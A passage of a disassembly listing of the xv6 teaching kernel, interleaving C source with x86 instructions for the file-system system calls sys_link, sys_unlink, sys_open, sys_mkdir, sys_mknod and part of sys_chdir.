80104f60: e8 eb c7 ff ff call 80101750 <iunlock> if((dp = nameiparent(new, name)) == 0) 80104f65: 58 pop %eax 80104f66: 5a pop %edx 80104f67: 57 push %edi 80104f68: ff 75 d0 pushl -0x30(%ebp) 80104f6b: e8 70 cf ff ff call 80101ee0 <nameiparent> 80104f70: 83 c4 10 add $0x10,%esp 80104f73: 85 c0 test %eax,%eax 80104f75: 89 c6 mov %eax,%esi 80104f77: 74 5b je 80104fd4 <sys_link+0xf4> goto bad; ilock(dp); 80104f79: 83 ec 0c sub $0xc,%esp 80104f7c: 50 push %eax 80104f7d: e8 ee c6 ff ff call 80101670 <ilock> if(dp->dev != ip->dev || dirlink(dp, name, ip->inum) < 0){ 80104f82: 83 c4 10 add $0x10,%esp 80104f85: 8b 03 mov (%ebx),%eax 80104f87: 39 06 cmp %eax,(%esi) 80104f89: 75 3d jne 80104fc8 <sys_link+0xe8> 80104f8b: 83 ec 04 sub $0x4,%esp 80104f8e: ff 73 04 pushl 0x4(%ebx) 80104f91: 57 push %edi 80104f92: 56 push %esi 80104f93: e8 68 ce ff ff call 80101e00 <dirlink> 80104f98: 83 c4 10 add $0x10,%esp 80104f9b: 85 c0 test %eax,%eax 80104f9d: 78 29 js 80104fc8 <sys_link+0xe8> iunlockput(dp); goto bad; } iunlockput(dp); 80104f9f: 83 ec 0c sub $0xc,%esp 80104fa2: 56 push %esi 80104fa3: e8 58 c9 ff ff call 80101900 <iunlockput> iput(ip); 80104fa8: 89 1c 24 mov %ebx,(%esp) 80104fab: e8 f0 c7 ff ff call 801017a0 <iput> end_op(); 80104fb0: e8 0b dc ff ff call 80102bc0 <end_op> return 0; 80104fb5: 83 c4 10 add $0x10,%esp 80104fb8: 31 c0 xor %eax,%eax ip->nlink--; iupdate(ip); iunlockput(ip); end_op(); return -1; } 80104fba: 8d 65 f4 lea -0xc(%ebp),%esp 80104fbd: 5b pop %ebx 80104fbe: 5e pop %esi 80104fbf: 5f pop %edi 80104fc0: 5d pop %ebp 80104fc1: c3 ret 80104fc2: 8d b6 00 00 00 00 lea 0x0(%esi),%esi if((dp = nameiparent(new, name)) == 0) goto bad; ilock(dp); if(dp->dev != ip->dev || dirlink(dp, name, ip->inum) < 0){ iunlockput(dp); 80104fc8: 83 ec 0c sub $0xc,%esp 80104fcb: 56 push %esi 80104fcc: e8 2f c9 ff ff call 80101900 <iunlockput> goto bad; 80104fd1: 83 c4 10 add $0x10,%esp end_op(); return 0; bad: ilock(ip); 80104fd4: 83 ec 0c sub $0xc,%esp 80104fd7: 53 push %ebx 80104fd8: e8 93 c6 ff ff call 80101670 <ilock> ip->nlink--; 80104fdd: 66 83 6b 56 01 subw $0x1,0x56(%ebx) iupdate(ip); 80104fe2: 89 1c 24 mov %ebx,(%esp) 80104fe5: e8 d6 c5 ff ff call 801015c0 <iupdate> iunlockput(ip); 80104fea: 89 1c 24 mov %ebx,(%esp) 80104fed: e8 0e c9 ff ff call 80101900 <iunlockput> end_op(); 80104ff2: e8 c9 db ff ff call 80102bc0 <end_op> return -1; 80104ff7: 83 c4 10 add $0x10,%esp } 80104ffa: 8d 65 f4 lea -0xc(%ebp),%esp ilock(ip); ip->nlink--; iupdate(ip); iunlockput(ip); end_op(); return -1; 80104ffd: b8 ff ff ff ff mov $0xffffffff,%eax } 80105002: 5b pop %ebx 80105003: 5e pop %esi 80105004: 5f pop %edi 80105005: 5d pop %ebp 80105006: c3 ret 80105007: 89 f6 mov %esi,%esi 80105009: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi return -1; } ilock(ip); if(ip->type == T_DIR){ iunlockput(ip); 80105010: 83 ec 0c sub $0xc,%esp 80105013: 53 push %ebx 80105014: e8 e7 c8 ff ff call 80101900 <iunlockput> end_op(); 80105019: e8 a2 db ff ff call 80102bc0 <end_op> return -1; 8010501e: 83 c4 10 add $0x10,%esp 80105021: b8 ff ff ff ff mov $0xffffffff,%eax 80105026: eb 92 jmp 80104fba <sys_link+0xda> if(argstr(0, &old) < 0 || argstr(1, &new) < 0) return -1; begin_op(); if((ip = namei(old)) == 0){ end_op(); 80105028: e8 93 db ff ff call 80102bc0 <end_op> return -1; 8010502d: b8 ff ff ff ff mov $0xffffffff,%eax 80105032: eb 86 jmp 80104fba <sys_link+0xda> 80105034: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 8010503a: 8d bf 00 00 00 00 lea 0x0(%edi),%edi 80105040 <sys_unlink>: } //PAGEBREAK! int sys_unlink(void) { 80105040: 55 push %ebp 80105041: 89 e5 mov %esp,%ebp 80105043: 57 push %edi 80105044: 56 push %esi 80105045: 53 push %ebx struct inode *ip, *dp; struct dirent de; char name[DIRSIZ], *path; uint off; if(argstr(0, &path) < 0) 80105046: 8d 45 c0 lea -0x40(%ebp),%eax } //PAGEBREAK! int sys_unlink(void) { 80105049: 83 ec 54 sub $0x54,%esp struct inode *ip, *dp; struct dirent de; char name[DIRSIZ], *path; uint off; if(argstr(0, &path) < 0) 8010504c: 50 push %eax 8010504d: 6a 00 push $0x0 8010504f: e8 fc f9 ff ff call 80104a50 <argstr> 80105054: 83 c4 10 add $0x10,%esp 80105057: 85 c0 test %eax,%eax 80105059: 0f 88 82 01 00 00 js 801051e1 <sys_unlink+0x1a1> return -1; begin_op(); if((dp = nameiparent(path, name)) == 0){ 8010505f: 8d 5d ca lea -0x36(%ebp),%ebx uint off; if(argstr(0, &path) < 0) return -1; begin_op(); 80105062: e8 e9 da ff ff call 80102b50 <begin_op> if((dp = nameiparent(path, name)) == 0){ 80105067: 83 ec 08 sub $0x8,%esp 8010506a: 53 push %ebx 8010506b: ff 75 c0 pushl -0x40(%ebp) 8010506e: e8 6d ce ff ff call 80101ee0 <nameiparent> 80105073: 83 c4 10 add $0x10,%esp 80105076: 85 c0 test %eax,%eax 80105078: 89 45 b4 mov %eax,-0x4c(%ebp) 8010507b: 0f 84 6a 01 00 00 je 801051eb <sys_unlink+0x1ab> end_op(); return -1; } ilock(dp); 80105081: 8b 75 b4 mov -0x4c(%ebp),%esi 80105084: 83 ec 0c sub $0xc,%esp 80105087: 56 push %esi 80105088: e8 e3 c5 ff ff call 80101670 <ilock> // Cannot unlink "." or "..". if(namecmp(name, ".") == 0 || namecmp(name, "..") == 0) 8010508d: 58 pop %eax 8010508e: 5a pop %edx 8010508f: 68 f8 79 10 80 push $0x801079f8 80105094: 53 push %ebx 80105095: e8 e6 ca ff ff call 80101b80 <namecmp> 8010509a: 83 c4 10 add $0x10,%esp 8010509d: 85 c0 test %eax,%eax 8010509f: 0f 84 fc 00 00 00 je 801051a1 <sys_unlink+0x161> 801050a5: 83 ec 08 sub $0x8,%esp 801050a8: 68 f7 79 10 80 push $0x801079f7 801050ad: 53 push %ebx 801050ae: e8 cd ca ff ff call 80101b80 <namecmp> 801050b3: 83 c4 10 add $0x10,%esp 801050b6: 85 c0 test %eax,%eax 801050b8: 0f 84 e3 00 00 00 je 801051a1 <sys_unlink+0x161> goto bad; if((ip = dirlookup(dp, name, &off)) == 0) 801050be: 8d 45 c4 lea -0x3c(%ebp),%eax 801050c1: 83 ec 04 sub $0x4,%esp 801050c4: 50 push %eax 801050c5: 53 push %ebx 801050c6: 56 push %esi 801050c7: e8 d4 ca ff ff call 80101ba0 <dirlookup> 801050cc: 83 c4 10 add $0x10,%esp 801050cf: 85 c0 test %eax,%eax 801050d1: 89 c3 mov %eax,%ebx 801050d3: 0f 84 c8 00 00 00 je 801051a1 <sys_unlink+0x161> goto bad; ilock(ip); 801050d9: 83 ec 0c sub $0xc,%esp 801050dc: 50 push %eax 801050dd: e8 8e c5 ff ff call 80101670 <ilock> if(ip->nlink < 1) 801050e2: 83 c4 10 add $0x10,%esp 801050e5: 66 83 7b 56 00 cmpw $0x0,0x56(%ebx) 801050ea: 0f 8e 24 01 00 00 jle 80105214 <sys_unlink+0x1d4> panic("unlink: nlink < 1"); if(ip->type == T_DIR && !isdirempty(ip)){ 801050f0: 66 83 7b 50 01 cmpw $0x1,0x50(%ebx) 801050f5: 8d 75 d8 lea -0x28(%ebp),%esi 801050f8: 74 66 je 80105160 <sys_unlink+0x120> iunlockput(ip); goto bad; } memset(&de, 0, sizeof(de)); 801050fa: 83 ec 04 sub $0x4,%esp 801050fd: 6a 10 push $0x10 801050ff: 6a 00 push $0x0 80105101: 56 push %esi 80105102: e8 89 f5 ff ff call 80104690 <memset> if(writei(dp, (char*)&de, off, sizeof(de)) != sizeof(de)) 80105107: 6a 10 push $0x10 80105109: ff 75 c4 pushl -0x3c(%ebp) 8010510c: 56 push %esi 8010510d: ff 75 b4 pushl -0x4c(%ebp) 80105110: e8 3b c9 ff ff call 80101a50 <writei> 80105115: 83 c4 20 add $0x20,%esp 80105118: 83 f8 10 cmp $0x10,%eax 8010511b: 0f 85 e6 00 00 00 jne 80105207 <sys_unlink+0x1c7> panic("unlink: writei"); if(ip->type == T_DIR){ 80105121: 66 83 7b 50 01 cmpw $0x1,0x50(%ebx) 80105126: 0f 84 9c 00 00 00 je 801051c8 <sys_unlink+0x188> dp->nlink--; iupdate(dp); } iunlockput(dp); 8010512c: 83 ec 0c sub $0xc,%esp 8010512f: ff 75 b4 pushl -0x4c(%ebp) 80105132: e8 c9 c7 ff ff call 80101900 <iunlockput> ip->nlink--; 80105137: 66 83 6b 56 01 subw $0x1,0x56(%ebx) iupdate(ip); 8010513c: 89 1c 24 mov %ebx,(%esp) 8010513f: e8 7c c4 ff ff call 801015c0 <iupdate> iunlockput(ip); 80105144: 89 1c 24 mov %ebx,(%esp) 80105147: e8 b4 c7 ff ff call 80101900 <iunlockput> end_op(); 8010514c: e8 6f da ff ff call 80102bc0 <end_op> return 0; 80105151: 83 c4 10 add $0x10,%esp 80105154: 31 c0 xor %eax,%eax bad: iunlockput(dp); end_op(); return -1; } 80105156: 8d 65 f4 lea -0xc(%ebp),%esp 80105159: 5b pop %ebx 8010515a: 5e pop %esi 8010515b: 5f pop %edi 8010515c: 5d pop %ebp 8010515d: c3 ret 8010515e: 66 90 xchg %ax,%ax isdirempty(struct inode *dp) { int off; struct dirent de; for(off=2*sizeof(de); off<dp->size; off+=sizeof(de)){ 80105160: 83 7b 58 20 cmpl $0x20,0x58(%ebx) 80105164: 76 94 jbe 801050fa <sys_unlink+0xba> 80105166: bf 20 00 00 00 mov $0x20,%edi 8010516b: eb 0f jmp 8010517c <sys_unlink+0x13c> 8010516d: 8d 76 00 lea 0x0(%esi),%esi 80105170: 83 c7 10 add $0x10,%edi 80105173: 3b 7b 58 cmp 0x58(%ebx),%edi 80105176: 0f 83 7e ff ff ff jae 801050fa <sys_unlink+0xba> if(readi(dp, (char*)&de, off, sizeof(de)) != sizeof(de)) 8010517c: 6a 10 push $0x10 8010517e: 57 push %edi 8010517f: 56 push %esi 80105180: 53 push %ebx 80105181: e8 ca c7 ff ff call 80101950 <readi> 80105186: 83 c4 10 add $0x10,%esp 80105189: 83 f8 10 cmp $0x10,%eax 8010518c: 75 6c jne 801051fa <sys_unlink+0x1ba> panic("isdirempty: readi"); if(de.inum != 0) 8010518e: 66 83 7d d8 00 cmpw $0x0,-0x28(%ebp) 80105193: 74 db je 80105170 <sys_unlink+0x130> ilock(ip); if(ip->nlink < 1) panic("unlink: nlink < 1"); if(ip->type == T_DIR && !isdirempty(ip)){ iunlockput(ip); 80105195: 83 ec 0c sub $0xc,%esp 80105198: 53 push %ebx 80105199: e8 62 c7 ff ff call 80101900 <iunlockput> goto bad; 8010519e: 83 c4 10 add $0x10,%esp end_op(); return 0; bad: iunlockput(dp); 801051a1: 83 ec 0c sub $0xc,%esp 801051a4: ff 75 b4 pushl -0x4c(%ebp) 801051a7: e8 54 c7 ff ff call 80101900 <iunlockput> end_op(); 801051ac: e8 0f da ff ff call 80102bc0 <end_op> return -1; 801051b1: 83 c4 10 add $0x10,%esp } 801051b4: 8d 65 f4 lea -0xc(%ebp),%esp return 0; bad: iunlockput(dp); end_op(); return -1; 801051b7: b8 ff ff ff ff mov $0xffffffff,%eax } 801051bc: 5b pop %ebx 801051bd: 5e pop %esi 801051be: 5f pop %edi 801051bf: 5d pop %ebp 801051c0: c3 ret 801051c1: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi memset(&de, 0, sizeof(de)); if(writei(dp, (char*)&de, off, sizeof(de)) != sizeof(de)) panic("unlink: writei"); if(ip->type == T_DIR){ dp->nlink--; 801051c8: 8b 45 b4 mov -0x4c(%ebp),%eax iupdate(dp); 801051cb: 83 ec 0c sub $0xc,%esp memset(&de, 0, sizeof(de)); if(writei(dp, (char*)&de, off, sizeof(de)) != sizeof(de)) panic("unlink: writei"); if(ip->type == T_DIR){ dp->nlink--; 801051ce: 66 83 68 56 01 subw $0x1,0x56(%eax) iupdate(dp); 801051d3: 50 push %eax 801051d4: e8 e7 c3 ff ff call 801015c0 <iupdate> 801051d9: 83 c4 10 add $0x10,%esp 801051dc: e9 4b ff ff ff jmp 8010512c <sys_unlink+0xec> struct dirent de; char name[DIRSIZ], *path; uint off; if(argstr(0, &path) < 0) return -1; 801051e1: b8 ff ff ff ff mov $0xffffffff,%eax 801051e6: e9 6b ff ff ff jmp 80105156 <sys_unlink+0x116> begin_op(); if((dp = nameiparent(path, name)) == 0){ end_op(); 801051eb: e8 d0 d9 ff ff call 80102bc0 <end_op> return -1; 801051f0: b8 ff ff ff ff mov $0xffffffff,%eax 801051f5: e9 5c ff ff ff jmp 80105156 <sys_unlink+0x116> int off; struct dirent de; for(off=2*sizeof(de); off<dp->size; off+=sizeof(de)){ if(readi(dp, (char*)&de, off, sizeof(de)) != sizeof(de)) panic("isdirempty: readi"); 801051fa: 83 ec 0c sub $0xc,%esp 801051fd: 68 1c 7a 10 80 push $0x80107a1c 80105202: e8 69 b1 ff ff call 80100370 <panic> goto bad; } memset(&de, 0, sizeof(de)); if(writei(dp, (char*)&de, off, sizeof(de)) != sizeof(de)) panic("unlink: writei"); 80105207: 83 ec 0c sub $0xc,%esp 8010520a: 68 2e 7a 10 80 push $0x80107a2e 8010520f: e8 5c b1 ff ff call 80100370 <panic> if((ip = dirlookup(dp, name, &off)) == 0) goto bad; ilock(ip); if(ip->nlink < 1) panic("unlink: nlink < 1"); 80105214: 83 ec 0c sub $0xc,%esp 80105217: 68 0a 7a 10 80 push $0x80107a0a 8010521c: e8 4f b1 ff ff call 80100370 <panic> 80105221: eb 0d jmp 80105230 <sys_open> 80105223: 90 nop 80105224: 90 nop 80105225: 90 nop 80105226: 90 nop 80105227: 90 nop 80105228: 90 nop 80105229: 90 nop 8010522a: 90 nop 8010522b: 90 nop 8010522c: 90 nop 8010522d: 90 nop 8010522e: 90 nop 8010522f: 90 nop 80105230 <sys_open>: return ip; } int sys_open(void) { 80105230: 55 push %ebp 80105231: 89 e5 mov %esp,%ebp 80105233: 57 push %edi 80105234: 56 push %esi 80105235: 53 push %ebx char *path; int fd, omode; struct file *f; struct inode *ip; if(argstr(0, &path) < 0 || argint(1, &omode) < 0) 80105236: 8d 45 e0 lea -0x20(%ebp),%eax return ip; } int sys_open(void) { 80105239: 83 ec 24 sub $0x24,%esp char *path; int fd, omode; struct file *f; struct inode *ip; if(argstr(0, &path) < 0 || argint(1, &omode) < 0) 8010523c: 50 push %eax 8010523d: 6a 00 push $0x0 8010523f: e8 0c f8 ff ff call 80104a50 <argstr> 80105244: 83 c4 10 add $0x10,%esp 80105247: 85 c0 test %eax,%eax 80105249: 0f 88 9e 00 00 00 js 801052ed <sys_open+0xbd> 8010524f: 8d 45 e4 lea -0x1c(%ebp),%eax 80105252: 83 ec 08 sub $0x8,%esp 80105255: 50 push %eax 80105256: 6a 01 push $0x1 80105258: e8 43 f7 ff ff call 801049a0 <argint> 8010525d: 83 c4 10 add $0x10,%esp 80105260: 85 c0 test %eax,%eax 80105262: 0f 88 85 00 00 00 js 801052ed <sys_open+0xbd> return -1; begin_op(); 80105268: e8 e3 d8 ff ff call 80102b50 <begin_op> if(omode & O_CREATE){ 8010526d: f6 45 e5 02 testb $0x2,-0x1b(%ebp) 80105271: 0f 85 89 00 00 00 jne 80105300 <sys_open+0xd0> if(ip == 0){ end_op(); return -1; } } else { if((ip = namei(path)) == 0){ 80105277: 83 ec 0c sub $0xc,%esp 8010527a: ff 75 e0 pushl -0x20(%ebp) 8010527d: e8 3e cc ff ff call 80101ec0 <namei> 80105282: 83 c4 10 add $0x10,%esp 80105285: 85 c0 test %eax,%eax 80105287: 89 c6 mov %eax,%esi 80105289: 0f 84 8e 00 00 00 je 8010531d <sys_open+0xed> end_op(); return -1; } ilock(ip); 8010528f: 83 ec 0c sub $0xc,%esp 80105292: 50 push %eax 80105293: e8 d8 c3 ff ff call 80101670 <ilock> if(ip->type == T_DIR && omode != O_RDONLY){ 80105298: 83 c4 10 add $0x10,%esp 8010529b: 66 83 7e 50 01 cmpw $0x1,0x50(%esi) 801052a0: 0f 84 d2 00 00 00 je 80105378 <sys_open+0x148> end_op(); return -1; } } if((f = filealloc()) == 0 || (fd = fdalloc(f)) < 0){ 801052a6: e8 c5 ba ff ff call 80100d70 <filealloc> 801052ab: 85 c0 test %eax,%eax 801052ad: 89 c7 mov %eax,%edi 801052af: 74 2b je 801052dc <sys_open+0xac> fdalloc(struct file *f) { int fd; struct proc *curproc = myproc(); for(fd = 0; fd < NOFILE; fd++){ 801052b1: 31 db xor %ebx,%ebx // Takes over file reference from caller on success. static int fdalloc(struct file *f) { int fd; struct proc *curproc = myproc(); 801052b3: e8 c8 e4 ff ff call 80103780 <myproc> 801052b8: 90 nop 801052b9: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi for(fd = 0; fd < NOFILE; fd++){ if(curproc->ofile[fd] == 0){ 801052c0: 8b 54 98 28 mov 0x28(%eax,%ebx,4),%edx 801052c4: 85 d2 test %edx,%edx 801052c6: 74 68 je 80105330 <sys_open+0x100> fdalloc(struct file *f) { int fd; struct proc *curproc = myproc(); for(fd = 0; fd < NOFILE; fd++){ 801052c8: 83 c3 01 add $0x1,%ebx 801052cb: 83 fb 10 cmp $0x10,%ebx 801052ce: 75 f0 jne 801052c0 <sys_open+0x90> } } if((f = filealloc()) == 0 || (fd = fdalloc(f)) < 0){ if(f) fileclose(f); 801052d0: 83 ec 0c sub $0xc,%esp 801052d3: 57 push %edi 801052d4: e8 57 bb ff ff call 80100e30 <fileclose> 801052d9: 83 c4 10 add $0x10,%esp iunlockput(ip); 801052dc: 83 ec 0c sub $0xc,%esp 801052df: 56 push %esi 801052e0: e8 1b c6 ff ff call 80101900 <iunlockput> end_op(); 801052e5: e8 d6 d8 ff ff call 80102bc0 <end_op> return -1; 801052ea: 83 c4 10 add $0x10,%esp f->ip = ip; f->off = 0; f->readable = !(omode & O_WRONLY); f->writable = (omode & O_WRONLY) || (omode & O_RDWR); return fd; } 801052ed: 8d 65 f4 lea -0xc(%ebp),%esp if((f = filealloc()) == 0 || (fd = fdalloc(f)) < 0){ if(f) fileclose(f); iunlockput(ip); end_op(); return -1; 801052f0: b8 ff ff ff ff mov $0xffffffff,%eax f->ip = ip; f->off = 0; f->readable = !(omode & O_WRONLY); f->writable = (omode & O_WRONLY) || (omode & O_RDWR); return fd; } 801052f5: 5b pop %ebx 801052f6: 5e pop %esi 801052f7: 5f pop %edi 801052f8: 5d pop %ebp 801052f9: c3 ret 801052fa: 8d b6 00 00 00 00 lea 0x0(%esi),%esi return -1; begin_op(); if(omode & O_CREATE){ ip = create(path, T_FILE, 0, 0); 80105300: 83 ec 0c sub $0xc,%esp 80105303: 8b 45 e0 mov -0x20(%ebp),%eax 80105306: 31 c9 xor %ecx,%ecx 80105308: 6a 00 push $0x0 8010530a: ba 02 00 00 00 mov $0x2,%edx 8010530f: e8 dc f7 ff ff call 80104af0 <create> if(ip == 0){ 80105314: 83 c4 10 add $0x10,%esp 80105317: 85 c0 test %eax,%eax return -1; begin_op(); if(omode & O_CREATE){ ip = create(path, T_FILE, 0, 0); 80105319: 89 c6 mov %eax,%esi if(ip == 0){ 8010531b: 75 89 jne 801052a6 <sys_open+0x76> end_op(); 8010531d: e8 9e d8 ff ff call 80102bc0 <end_op> return -1; 80105322: b8 ff ff ff ff mov $0xffffffff,%eax 80105327: eb 43 jmp 8010536c <sys_open+0x13c> 80105329: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi fileclose(f); iunlockput(ip); end_op(); return -1; } iunlock(ip); 80105330: 83 ec 0c sub $0xc,%esp int fd; struct proc *curproc = myproc(); for(fd = 0; fd < NOFILE; fd++){ if(curproc->ofile[fd] == 0){ curproc->ofile[fd] = f; 80105333: 89 7c 98 28 mov %edi,0x28(%eax,%ebx,4) fileclose(f); iunlockput(ip); end_op(); return -1; } iunlock(ip); 80105337: 56 push %esi 80105338: e8 13 c4 ff ff call 80101750 <iunlock> end_op(); 8010533d: e8 7e d8 ff ff call 80102bc0 <end_op> f->type = FD_INODE; 80105342: c7 07 02 00 00 00 movl $0x2,(%edi) f->ip = ip; f->off = 0; f->readable = !(omode & O_WRONLY); 80105348: 8b 55 e4 mov -0x1c(%ebp),%edx f->writable = (omode & O_WRONLY) || (omode & O_RDWR); 8010534b: 83 c4 10 add $0x10,%esp } iunlock(ip); end_op(); f->type = FD_INODE; f->ip = ip; 8010534e: 89 77 10 mov %esi,0x10(%edi) f->off = 0; 80105351: c7 47 14 00 00 00 00 movl $0x0,0x14(%edi) f->readable = !(omode & O_WRONLY); 80105358: 89 d0 mov %edx,%eax 8010535a: 83 e0 01 and $0x1,%eax 8010535d: 83 f0 01 xor $0x1,%eax f->writable = (omode & O_WRONLY) || (omode & O_RDWR); 80105360: 83 e2 03 and $0x3,%edx end_op(); f->type = FD_INODE; f->ip = ip; f->off = 0; f->readable = !(omode & O_WRONLY); 80105363: 88 47 08 mov %al,0x8(%edi) f->writable = (omode & O_WRONLY) || (omode & O_RDWR); 80105366: 0f 95 47 09 setne 0x9(%edi) return fd; 8010536a: 89 d8 mov %ebx,%eax } 8010536c: 8d 65 f4 lea -0xc(%ebp),%esp 8010536f: 5b pop %ebx 80105370: 5e pop %esi 80105371: 5f pop %edi 80105372: 5d pop %ebp 80105373: c3 ret 80105374: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi if((ip = namei(path)) == 0){ end_op(); return -1; } ilock(ip); if(ip->type == T_DIR && omode != O_RDONLY){ 80105378: 8b 4d e4 mov -0x1c(%ebp),%ecx 8010537b: 85 c9 test %ecx,%ecx 8010537d: 0f 84 23 ff ff ff je 801052a6 <sys_open+0x76> 80105383: e9 54 ff ff ff jmp 801052dc <sys_open+0xac> 80105388: 90 nop 80105389: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 80105390 <sys_mkdir>: return fd; } int sys_mkdir(void) { 80105390: 55 push %ebp 80105391: 89 e5 mov %esp,%ebp 80105393: 83 ec 18 sub $0x18,%esp char *path; struct inode *ip; begin_op(); 80105396: e8 b5 d7 ff ff call 80102b50 <begin_op> if(argstr(0, &path) < 0 || (ip = create(path, T_DIR, 0, 0)) == 0){ 8010539b: 8d 45 f4 lea -0xc(%ebp),%eax 8010539e: 83 ec 08 sub $0x8,%esp 801053a1: 50 push %eax 801053a2: 6a 00 push $0x0 801053a4: e8 a7 f6 ff ff call 80104a50 <argstr> 801053a9: 83 c4 10 add $0x10,%esp 801053ac: 85 c0 test %eax,%eax 801053ae: 78 30 js 801053e0 <sys_mkdir+0x50> 801053b0: 83 ec 0c sub $0xc,%esp 801053b3: 8b 45 f4 mov -0xc(%ebp),%eax 801053b6: 31 c9 xor %ecx,%ecx 801053b8: 6a 00 push $0x0 801053ba: ba 01 00 00 00 mov $0x1,%edx 801053bf: e8 2c f7 ff ff call 80104af0 <create> 801053c4: 83 c4 10 add $0x10,%esp 801053c7: 85 c0 test %eax,%eax 801053c9: 74 15 je 801053e0 <sys_mkdir+0x50> end_op(); return -1; } iunlockput(ip); 801053cb: 83 ec 0c sub $0xc,%esp 801053ce: 50 push %eax 801053cf: e8 2c c5 ff ff call 80101900 <iunlockput> end_op(); 801053d4: e8 e7 d7 ff ff call 80102bc0 <end_op> return 0; 801053d9: 83 c4 10 add $0x10,%esp 801053dc: 31 c0 xor %eax,%eax } 801053de: c9 leave 801053df: c3 ret char *path; struct inode *ip; begin_op(); if(argstr(0, &path) < 0 || (ip = create(path, T_DIR, 0, 0)) == 0){ end_op(); 801053e0: e8 db d7 ff ff call 80102bc0 <end_op> return -1; 801053e5: b8 ff ff ff ff mov $0xffffffff,%eax } iunlockput(ip); end_op(); return 0; } 801053ea: c9 leave 801053eb: c3 ret 801053ec: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 801053f0 <sys_mknod>: int sys_mknod(void) { 801053f0: 55 push %ebp 801053f1: 89 e5 mov %esp,%ebp 801053f3: 83 ec 18 sub $0x18,%esp struct inode *ip; char *path; int major, minor; begin_op(); 801053f6: e8 55 d7 ff ff call 80102b50 <begin_op> if((argstr(0, &path)) < 0 || 801053fb: 8d 45 ec lea -0x14(%ebp),%eax 801053fe: 83 ec 08 sub $0x8,%esp 80105401: 50 push %eax 80105402: 6a 00 push $0x0 80105404: e8 47 f6 ff ff call 80104a50 <argstr> 80105409: 83 c4 10 add $0x10,%esp 8010540c: 85 c0 test %eax,%eax 8010540e: 78 60 js 80105470 <sys_mknod+0x80> argint(1, &major) < 0 || 80105410: 8d 45 f0 lea -0x10(%ebp),%eax 80105413: 83 ec 08 sub $0x8,%esp 80105416: 50 push %eax 80105417: 6a 01 push $0x1 80105419: e8 82 f5 ff ff call 801049a0 <argint> struct inode *ip; char *path; int major, minor; begin_op(); if((argstr(0, &path)) < 0 || 8010541e: 83 c4 10 add $0x10,%esp 80105421: 85 c0 test %eax,%eax 80105423: 78 4b js 80105470 <sys_mknod+0x80> argint(1, &major) < 0 || argint(2, &minor) < 0 || 80105425: 8d 45 f4 lea -0xc(%ebp),%eax 80105428: 83 ec 08 sub $0x8,%esp 8010542b: 50 push %eax 8010542c: 6a 02 push $0x2 8010542e: e8 6d f5 ff ff call 801049a0 <argint> char *path; int major, minor; begin_op(); if((argstr(0, &path)) < 0 || argint(1, &major) < 0 || 80105433: 83 c4 10 add $0x10,%esp 80105436: 85 c0 test %eax,%eax 80105438: 78 36 js 80105470 <sys_mknod+0x80> argint(2, &minor) < 0 || 8010543a: 0f bf 45 f4 movswl -0xc(%ebp),%eax 8010543e: 83 ec 0c sub $0xc,%esp 80105441: 0f bf 4d f0 movswl -0x10(%ebp),%ecx 80105445: ba 03 00 00 00 mov $0x3,%edx 8010544a: 50 push %eax 8010544b: 8b 45 ec mov -0x14(%ebp),%eax 8010544e: e8 9d f6 ff ff call 80104af0 <create> 80105453: 83 c4 10 add $0x10,%esp 80105456: 85 c0 test %eax,%eax 80105458: 74 16 je 80105470 <sys_mknod+0x80> (ip = create(path, T_DEV, major, minor)) == 0){ end_op(); return -1; } iunlockput(ip); 8010545a: 83 ec 0c sub $0xc,%esp 8010545d: 50 push %eax 8010545e: e8 9d c4 ff ff call 80101900 <iunlockput> end_op(); 80105463: e8 58 d7 ff ff call 80102bc0 <end_op> return 0; 80105468: 83 c4 10 add $0x10,%esp 8010546b: 31 c0 xor %eax,%eax } 8010546d: c9 leave 8010546e: c3 ret 8010546f: 90 nop begin_op(); if((argstr(0, &path)) < 0 || argint(1, &major) < 0 || argint(2, &minor) < 0 || (ip = create(path, T_DEV, major, minor)) == 0){ end_op(); 80105470: e8 4b d7 ff ff call 80102bc0 <end_op> return -1; 80105475: b8 ff ff ff ff mov $0xffffffff,%eax } iunlockput(ip); end_op(); return 0; } 8010547a: c9 leave 8010547b: c3 ret 8010547c: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 80105480 <sys_chdir>: int sys_chdir(void) { 80105480: 55 push %ebp 80105481: 89 e5 mov %esp,%ebp 80105483: 56 push %esi 80105484: 53 push %ebx 80105485: 83 ec 10 sub $0x10,%esp char *path; struct inode *ip; struct proc *curproc = myproc(); 80105488: e8 f3 e2 ff ff call 80103780 <myproc> 8010548d: 89 c6 mov %eax,%esi begin_op(); 8010548f: e8 bc d6 ff ff call 80102b50 <begin_op> if(argstr(0, &path) < 0 || (ip = namei(path)) == 0){ 80105494: 8d 45 f4 lea -0xc(%ebp),%eax 80105497: 83 ec 08 sub $0x8,%esp 8010549a: 50 push %eax 8010549b: 6a 00 push $0x0 8010549d: e8 ae f5 ff ff call 80104a50 <argstr> 801054a2: 83 c4 10 add $0x10,%esp 801054a5: 85 c0 test %eax,%eax 801054a7: 78 77 js 80105520 <sys_chdir+0xa0> 801054a9: 83 ec 0c sub $0xc,%esp 801054ac: ff 75 f4 pushl -0xc(%ebp) 801054af: e8 0c ca ff ff call 80101ec0 <namei> 801054b4: 83 c4 10 add $0x10,%esp 801054b7: 85 c0 test %eax,%eax 801054b9: 89 c3 mov %eax,%ebx 801054bb: 74 63 je 80105520 <sys_chdir+0xa0> end_op(); return -1; } ilock(ip); 801054bd: 83 ec 0c sub $0xc,%esp 801054c0: 50 push %eax 801054c1: e8 aa c1 ff ff call 80101670 <ilock> if(ip->type != T_DIR){ 801054c6: 83 c4 10 add $0x10,%esp 801054c9: 66 83 7b 50 01 cmpw $0x1,0x50(%ebx) 801054ce: 75 30 jne 80105500 <sys_chdir+0x80> iunlockput(ip); end_op(); return -1; } iunlock(ip); 801054d0: 83 ec 0c sub $0xc,%esp 801054d3: 53 push %ebx 801054d4: e8 77 c2 ff ff call 80101750 <iunlock> iput(curproc->cwd); 801054d9: 58 pop %eax 801054da: ff 76 68 pushl 0x68(%esi) 801054dd: e8 be c2 ff ff call 801017a0 <iput> end_op(); 801054e2: e8 d9 d6 ff ff call 80102bc0 <end_op> 